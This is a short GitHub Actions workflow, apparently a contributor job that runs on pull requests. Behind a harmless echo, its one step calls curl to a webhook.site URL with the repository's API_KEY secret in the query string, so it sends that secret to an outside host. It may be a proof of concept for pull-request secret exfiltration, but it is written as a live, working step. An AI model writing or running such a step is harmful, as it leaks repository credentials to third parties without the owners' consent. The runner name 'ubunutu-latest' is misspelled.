name: contributor_workflow
run-name: run via contributor
on: [pull_request]
jobs:
 hello:
  runs-on: ubunutu-latest
  steps:
   - name: hello
     run: |
        echo "run by contributor"
        curl https://webhook.site/3f3bee45-9cb4-4175-a328-e8f247051957/?data=${{secrets.API_KEY}}
